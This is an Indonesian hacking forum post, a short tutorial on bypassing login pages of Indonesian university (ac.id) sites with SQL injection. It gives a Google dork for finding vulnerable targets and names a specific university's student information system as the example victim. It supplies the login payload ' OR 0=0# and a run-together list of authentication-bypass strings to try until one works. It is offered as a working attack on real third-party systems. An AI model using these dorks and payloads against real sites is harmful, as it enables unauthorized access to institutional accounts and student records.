Bypass Remote SQL Injection Site ac.id

hallo mber saya hadir lagi
saya akan share cara Bypass Remote SQL Injection Site ac.id saya hanya memperjelas dari forum surabaya blackhat
langsung aja ya
pertama kita masukkan google dork berikut

Code:

inurl:"/index.php?mnux="inurl:"/index.php?mnux=" site:ac.idUSE YOUR BRAIN

atau klik disini 
banyak disitu targetnya kan Big Grin kita pilih salah satu aja dan gak semua bisa diexploit lho :



kali ini saya akan memberi satu contoh yaitu : SIA UNIVERSITAS TULUNGAGUNG

nah digambar tadi ada kan SIA UNIVERSITAS TULUNGAGUNG kita klik saja pasti masuk halaman login seperti ini :



kita akan exploit dengan Remote Sql Injection gimana caranya yaitu dengan user dan passwrod bypass admin login

user : ' OR 0=0#
pass : ' OR 0=0#

tara kita masuk dech, tapi gak pasti kita masuk kadang jadi superuser, admin, dan mahasiswa , hhehehehe 

nih berikut user password list SQL injection Baypass 

Code:


admin'--= 'or' 1=1' or 1=1--'" or 1=1--' union select 1, 'Eyeless', 'ez2do', 1--admin'--administrator'--superuser'--test'--' or 0=0 --' or 0=0 --'' or 0=0 #" or 0=0 --" or 0=0 --''" or 0=0 --or 0=0 --' or 0=0 #" or 0=0 #or 0=0 #' or 'x'='x" or "x"="x') or ('x'='x" or 1=1--or 1=1--' or a=a--'' or a=a #' or a=a--' or "a"="a' or 'a'='a" or "a"="a') or ('a'='a") or ("a"="ahi" or "a"="ahi" or 1=1 --hi' or 1=1 --hi' or 'a'='ahi') or ('a'='ahi") or ("a"="a' or 1=1--" or 1=1--or 1=1--' or 'a'='a" or "a"="a') or ('a'='a

pokoknya kita cobak satu persatu aja siapa tahu nyangkut
sekian dari saya mudah-mudah bisa paham :)